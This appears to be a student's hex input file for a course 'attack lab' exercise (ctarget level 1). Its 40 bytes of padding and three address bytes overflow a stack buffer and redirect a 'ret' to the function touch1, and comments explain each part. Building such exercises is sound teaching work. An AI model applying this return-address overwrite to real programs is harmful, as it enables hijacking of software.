/*  Column   1  2  3  4  5  6  7  8 */ /* Line */
            90 90 90 90 90 90 90 90    /*   1  */
            90 90 90 90 90 90 90 90    /*   2  */
            90 90 90 90 90 90 90 90    /*   3  */
            90 90 90 90 90 90 90 90    /*   4  */
            90 90 90 90 90 90 90 90    /*   5  */  
            BE 17 40                   /*   6  */  
/* ctarget level 1 hex code, for touch1.                                                   */
/* the first 40 bytes are padding.                                                         */
/* you can write anything you like in them, except '0A', which is the newline character.   */
/* and the last 3 bytes will cover and overwrite the original bytes in the stack           */
/* the 3-rd from the end byte can be 'BE', 'BF', or 'C0'                                   */
/* so that the 'ret' instruction will not return to the correct caller 'test'.             */
/* instead, it will "return" to '0x4017be' (or 'bf', 'c0'), which is function 'touch1'.    */